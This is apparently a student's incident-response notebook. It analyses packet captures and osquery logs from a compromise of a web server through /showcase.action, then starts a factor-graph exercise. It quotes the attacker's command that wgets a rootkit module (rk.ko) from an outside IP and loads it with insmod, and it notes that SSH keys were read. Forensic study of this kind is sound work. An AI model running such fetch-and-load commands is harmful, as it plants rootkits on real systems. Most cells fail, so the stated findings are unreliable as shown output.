In [2]:
!pip install pyshark;

    100% |████████████████████████████████| 266kB 3.4MB/s ta 0:00:011
    100% |████████████████████████████████| 92kB 8.3MB/s eta 0:00:01
  Running setup.py bdist_wheel for pyshark ... done
  Stored in directory: /Users/akhil.chainani/Library/Caches/pip/wheels/6c/08/bd/969c9a0cd91fa0952978abc1b132a5055eeeead708d01d8999
  Running setup.py bdist_wheel for trollius ... done
  Stored in directory: /Users/akhil.chainani/Library/Caches/pip/wheels/9b/b8/d7/29d9b8127810ea075105bc1843aa43a2d5d1590b585b8ea2f4
  Running setup.py bdist_wheel for logbook ... done
  Stored in directory: /Users/akhil.chainani/Library/Caches/pip/wheels/61/4f/6d/e5e28bfb5ef9f2bafc44c3387f2409c3fce7b252ba03ac4791
Successfully built pyshark trollius logbook
You are using pip version 9.0.1, however version 10.0.1 is available.
You should consider upgrading via the 'pip install --upgrade pip' command.


In [15]:
import pyshark
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt

import opengm
import numpy as np

import sys
import logging
logging.basicConfig(level=logging.DEBUG,
                    format='[%(levelname)s] (%(threadName)-10s) %(message)s',
                    stream=sys.stdout)
logging.info("Imports successful")

ModuleNotFoundError: No module named 'opengm'

## Task 0.1 - A Little Domain Knowledge
#### TCP/IP
Transmission Control Protocol/Internet Protocol is the language a computer uses to access the Internet. It's a suite of protocols including TCP and IP. TCP handles messaging, breaking down the message into packets and reassembling at the other end. IP handles transmission.
#### UDP
User Datagram Protocol, another language of the TCP/IP suite. Compared to TCP/IP, UDP allows for packet-drop and it doesn't do any error-checking or correcting. While this system isn't resilient, it is high performance and good for real-time applications.
#### DNS
Domain Name System, a hierarchical naming system for IP addresses, making it possible to assign domain names regardless of the entities' physical location.
#### HTTP
HyperText Transfer Protocol, an application-level protocol on the World Wide Web. Basically, it's how a browser and webserver for a website communicate.
#### SSH
Secure Shell, a cryptographic protocol that allows for remote connection between two users to enable remote shell and networking services.
#### GET Requests
An HTTP request method which can be cached, remain in browser history, and can be bookmarked, but shouldn't be used for dealing with sensitive data, in applications that don't have length restrictions, and for anything other than data retrieval.
#### File System Layout
At a glance, Unix-based systems have five main system file systems - /, /usr, /var, /tmp, and /home.
#### System Logging Mechanisms
Unix's system logging syslog basically is the central hub for logs. Programs send log entries to syslog, syslog matches entries with its config file, and then it writes the log.
#### Privilege Escalation
A method of attack that exploits a bug, design flaw, or configuration oversight in a system that allows elevated access to resources that normally would be protected by a developer or system administrator.
#### Rootkit
Software used by a hacker to gain constant administrator-level access to a computer or network. It's typically installed either via a stolen password or vulnerabilities. 
#### Remote Code Execution
Vulnerabilities in a system may allow an attacker to execute malicious code and take control of a vulnerable system. Once given access, attackers will often try to achieve privilege escalation.
#### Intrusion Detection System
A device or software designed to monitor a network or system for malicious activity or policy violations. Any such activity or anomalies would be reported to an administrator or to a central security information and event management system.

## Task 0.2 - Porting .pcaps
#### Creating the datasets from the .pcap files

In [10]:
http = pyshark.FileCapture('http.pcap', keep_packets=True)
try:
    i = 0
    while True:
        http[i]
        i += 1
except KeyError:
    pass

TSharkNotFoundException: TShark not found. Try adding its location to the configuration file. Search these paths: ['C:\\Program Files\\Wireshark\\tshark.exe', '/anaconda3/bin/tshark', '/usr/local/opt/opencv@2/bin/tshark', '/usr/local/bin/tshark', '/anaconda3/bin/tshark', '/opt/local/bin/tshark', '/opt/local/sbin/tshark', '/usr/local/bin/tshark', '/usr/bin/tshark', '/bin/tshark', '/usr/sbin/tshark', '/sbin/tshark', '/opt/X11/bin/tshark', '/Library/TeX/texbin/tshark']

In [11]:
dns = pyshark.FileCapture('dns.pcap', keep_packets=True)
try:
    i = 0
    while True:
        dns[i]
        i += 1
except KeyError:
    pass

TSharkNotFoundException: TShark not found. Try adding its location to the configuration file. Search these paths: ['C:\\Program Files\\Wireshark\\tshark.exe', '/anaconda3/bin/tshark', '/usr/local/opt/opencv@2/bin/tshark', '/usr/local/bin/tshark', '/anaconda3/bin/tshark', '/opt/local/bin/tshark', '/opt/local/sbin/tshark', '/usr/local/bin/tshark', '/usr/bin/tshark', '/bin/tshark', '/usr/sbin/tshark', '/sbin/tshark', '/opt/X11/bin/tshark', '/Library/TeX/texbin/tshark']

In [12]:
print("Number of HTTP Packets:", len(http))
print("Number of DNS Packets:", len(dns))

Number of HTTP Packets: 0
Number of DNS Packets: 0


#### Creating the HTTP dataframe

In [ ]:
http_data = []
for i in range(len(http)):
    if len(http[i].layers) < 3:
        continue
    if http[i][2].layer_name != 'tcp':
        continue
    d = {
        'src_ip': http[i]['ip'].src,
        'timestamp': http[i].sniff_time,
        'length': http[i].length,
        'dst_ip': http[i]['ip'].dst,
        'dst_port': http[i]['tcp'].dstport,
        'highest_layer': http[i].highest_layer,
    }
    http_data.append(d)

In [ ]:
http_df = pd.DataFrame(http_data)
http_df['timestamp'] = pd.to_datetime(http_df['timestamp'])
http_df = http_df[['timestamp', 'src_ip', 'dst_ip', 'dst_port', 'length', 'highest_layer']]
http_df.head()

#### Creating the DNS dataframe

In [ ]:
dns_data = []
for i in range(len(dns)):
    if len(dns[i].layers) < 3:
        continue
    if dns[i][2].layer_name != 'tcp':
        continue
    d = {
        'src_ip': dns[i]['ip'].src,
        'timestamp': dns[i].sniff_time,
        'length': dns[i].length,
        'dst_ip': dns[i]['ip'].dst,
        'dst_port': dns[i]['tcp'].dstport,
        'highest_layer': dns[i].highest_layer
    }
    dns_data.append(d)

In [ ]:
dns_df = pd.DataFrame(dns_data)
dns_df['timestamp'] = pd.to_datetime(dns_df['timestamp'])
dns_df = dns_df[['timestamp', 'src_ip', 'dst_ip', 'dst_port', 'length', 'highest_layer']]
dns_df.head()

## Task 0.3 - Parsing the OS Queries

In [ ]:
data = []
fname = 'osqueryd.results.log'
with open(fname, 'r') as file:
    for line in file:
        data.append(eval(line))

In [ ]:
from pandas.io.json import json_normalize
os_query = json_normalize(data)
os_query['unixTime'] = pd.to_numeric(os_query['unixTime'])
os_query.head()

## Task 1.1 - Addressing the Vulnerabilities
We begin by examining all IPs that tried to initiate a scan with /showcase.action. We'll log the packet number, the source IP, the destination IP and port, and relevant time information.

In [ ]:
for i in range(len(http)):
    if 'HTTP' in str(http[i].layers):
        if 'chat' in str(dir(http[i]['http'])):
            if '/showcase.action' in http[i]['http'].chat:
                print("[" + str(i) + "]", "IP Trace:", http[i]['ip'].src, "->", http[i]['ip'].dst, ":", http[i]['tcp'].dstport)
                print("\tTime:", http[i].sniff_time)
                print("\tTimestamp:", http[i].sniff_timestamp, '\n')

### Task 1.1a
The first known scan that used /showcase.action occurred at Unix timestamp 1521394903.610774000

### Task 1.1b
The IP address of the vulnertable server is at 172.17.0.2

### Task 1.1c
The port of the vulnertable server is at port 8080

## Task 1.2 - Analyzing the Attack
### Task 1.2a - Examining the Content-Type Headers
While 10.0.2.2 was the first IP to query the /showcase.action page, it appears IP 172.17.0.1 is the attacker who successfully deployed payloads to the server. This is pretty apparent once we see if the packet has Content-Type headers available. The code below prints out the packet number, the length of the content header, and the content header itself.

In [ ]:
for i in range(len(http)):
    if 'HTTP' in str(http[i].layers) and '172.17.0.2' in http[i]['ip'].dst:
        if 'content_type' in str(dir(http[i]['http'])):
            print("[" + str(i) + "]", "Length =", len(http[i]['http'].content_type))
            print(http[i]['http'].content_type, '\n')

### Task 1.2b
Some of the commands in the table were present in the attack
<table>
<tr>
    <th>Command Name</th>
    <th>Present in the attack?</th>
    <th>Interpretation of command</th>
<tr>
    <td><b>whoami</b></td>
    <td>Yes (Packet 534)</td>
    <td>Displays the name of the current user</td>
</tr>
<tr>
    <td><b>wget</b></td>
    <td>Yes (Packets 546 and 572)</td>
    <td>Downloads a file from the Internet, perhaps a malicious file</td>
</tr>
<tr>
    <td><b>ls</b></td>
    <td>Yes (Packet 524)</td>
    <td>List files in the current directory</td>
</tr>
<tr>
    <td><b>cat</b></td>
    <td>No</td>
    <td></td>
</tr>
<tr>
    <td><b>cd</b></td>
    <td>No</td>
    <td></td>
</tr>
<tr>
    <td><b>insmod</b></td>
    <td>Yes (Packets 582, 592, 602)</td>
    <td>Inserts a module into the Linux Kernel, most likely the malicious file from wget</td>
</tr>
<tr>
    <td><b>ssh</b></td>
    <td>No</td>
    <td></td>
</tr>
<table>

## Task 1.3 - Examining Modules
### Task 1.3.1 - Kernel Modules Modified
Using the OS query dataframe, we can slice the data by first finding entries that had to do with kernel_module and then find the actual modules modified in the columns.name column. The code below runs through the list of unique kernel modules in the log.

In [ ]:
for module in os_query[os_query['name'] == 'kernel_module']['columns.name'].unique():
    print(module)

### Task 1.3.1 - The Malicious Module
Reading through the entries that contained a wget command in Task 1.2, there's this line that's interesting:
<center><b>#cmd='wget http://162.212.156.148/rk.ko > rk.ko'</b></center>

wget redirected the downloaded file into rk.ko. Therefore, rk.ko is the attacker-controlled module.

### Task 1.3.1 - The Compromise
The code below takes the OS query log and filters for any entries that dealt with the rk module. The attacker called wget at Unix time 1521395127.885892000 and insmod at 1521395147.190608000.

rk was added and removed at Unix times 1521475134 and 1521475138, respectively. Time-wise, this lines up with the attacker's intrusion and installation. We also know that the attacker will be executing at root privilege. Looking in the decorations.username column, we see these entries were done at root privilege. Based on time and privilege level, it makes sense the attacker was successful in loading a controlled module into the kernel via the compromised server.

In [ ]:
os_query[os_query['columns.name'] == 'rk']

### Task 1.3.2 - The Extraction
The command below takes the OSQuery log and filters for any entries that dealt with the id_rsa. The series of rsa-related actions occur sequentially at Unix-time 1521397187.

The intrusion began at Unix-time 1521394990.943891000, so the extraction of the secret and public RSA keys lines up with the attack timeline. There are no other records that had to do with RSA, so based on this, we can say the secret key was read from the server during the attack.

In [ ]:
os_query['columns.target_path'] = os_query['columns.target_path'].astype(str)
os_query[os_query['columns.target_path'].str.contains('id_rsa')]

### Task 1.4.1 - Differentiating the DNS Servers
To figure out who was sending DNS responses, we can check if the response flag is set. If it's set to 1, it's a response, and we can log the IP source. Below, the code logs the packet number, the source IP, the destination IP, and any queries and responses related to the exchange.

Doing this, we recognize two server IPs: 162.212.156.148 and 75.75.75.75. 162.212.156.148 is clearly the malicious server for two reasons. First, queries/responses to/from this IP go to rather suspicious places. Further down, some queries/responses are just long strings. Second, and this is more or less the smoking gun, the wget command that downloaded the malicious rk.ko was to that IP.

In [5]:
server_ip = set()
for i in range(len(dns)):
    if 'DNS' in str(dns[i].layers):
        if dns[i]['dns'].flags_response == '1':
            server_ip.add(dns[i]['ip'].src)
            print('[' + str(i) + ']', dns[i]['ip'].src, "->", dns[i]['ip'].dst)
            print("Query:") 
            print('\tType:', dns[i]['dns'].qry_type, '\n\tName:', dns[i]['dns'].qry_name, '\n\tLength:', dns[i]['dns'].qry_name_len)
            try:
                print('Response:\n', '\tType:', dns[i]['dns'].resp_type, '\n\tName:', dns[i]['dns'].resp_name, '\n\tLength:', dns[i]['dns'].resp_len)
            except:
                print('\n')
                continue

NameError: name 'dns' is not defined

In [6]:
server_ip

set()

### Task 1.4.2 - The Histogram of DNS Queries
Using the same block of code but with the flags_response flag condition check set to 0 for queries, we can keep a list of query lengths to both IPs and plot the results.

In [7]:
malicious_queries = []
malicious_query_count = 0
legitimate_queries = []
legitimate_query_count = 0
for i in range(len(dns)):
    if 'DNS' in str(dns[i].layers):
        if dns[i]['dns'].flags_response == '0':
            if dns[i]['ip'].dst == '162.212.156.148':
                malicious_query_count += 1
                malicious_queries.append(int(dns[i]['dns'].qry_name_len))
            elif dns[i]['ip'].dst == '75.75.75.75':
                legitimate_query_count += 1
                legitimate_queries.append(int(dns[i]['dns'].qry_name_len))
print("Malicious count:", malicious_query_count)
print("Legitimate count:", legitimate_query_count)

NameError: name 'dns' is not defined

In [8]:
fig, ax = plt.subplots(nrows=2, figsize=(16, 9), dpi=150)
ax[0].hist(malicious_queries, bins = 100, color='red')
ax[0].set_yscale("log", nonposy='clip')
ax[0].set_title('Malicious Query Lengths')
ax[0].set_xticks(np.arange(min(malicious_queries)-10, max(malicious_queries)+10, 10))
ax[1].hist(legitimate_queries, bins = 100)
ax[1].set_yscale("log", nonposy='clip')
ax[1].set_title('Legitimate Query Lengths')
ax[1].set_xticks(np.arange(min(legitimate_queries), max(legitimate_queries)+1, 1))
plt.show()

/anaconda3/lib/python3.6/site-packages/matplotlib/ticker.py:2206: UserWarning: Data has no positive values, and therefore cannot be log-scaled.
  "Data has no positive values, and therefore cannot be "


ValueError: min() arg is an empty sequence

It's very clear that the malicious server not only saw more activity (1120 vs. 21 queries), but it also had more queries over a larger range or sizes (15-255 vs. 9-33).

TASK 2

In [13]:
class FactorGraph(object):
    
    def __init__(self):
        logging.debug("Created Factor Graph Object")
    
    def infer(self):
        logging.info("Running Inference")
        ###########################
        # define binary variables #
        ###########################
        # two binary variables: 
        # var 0 (stage S1): dimension is 2
        # var 1 (event E1): dimension is 2
        variables = [2,2]

        ################################
        # # construct the Factor Graph #
        ################################
        gm = opengm.graphicalModel(variables, operator='multiplier')

        ########################################################################################
        # TODO: Fill in values in g_func, and g_var, according to the provided tables #
        ########################################################################################
        f_func = np.array([0.1, 0.9])   # priors f
        f_var = [0]                     # f(S1) using S1 as variable 0
        g_func = np.array([[,],[,]])    # factor function g
        g_var = [,]                     # g(S1, S2)
        ############
        # END TODO #
        ############


        ##################################
        # connect factor functions to FG #
        ##################################

        gm.addFactor(gm.addFunction(f_func),f_var) # add prior to event
        gm.addFactor(gm.addFunction(g_func),g_var) # add factor function to event (E1) and stage (S1)


        ##################################
        # # belief propagation inference #
        ##################################
        inf=opengm.inference.BeliefPropagation(gm,accumulator='maximizer')
        inf.infer()

        ##############
        # get argmax #
        ##############

        arg=inf.arg()
        print("Inference result: ", arg)

        ##############################
        # get marginal probabilities #
        ##############################
        marginals = inf.marginals(range(len(variables)))

        #############################################################
        # # get marginal of the state variable (variable index = 0) #
        #############################################################
        vars = [0]
        for i in vars:
            marginals_xi = marginals[i]
            marginals_xi /= np.sum(marginals_xi)
            print("x_{} marginal: {}".format(i, marginals_xi))
        pass

ModuleNotFoundError: No module named 'opengm'

In [ ]:
m = FactorGraph()
m.infer()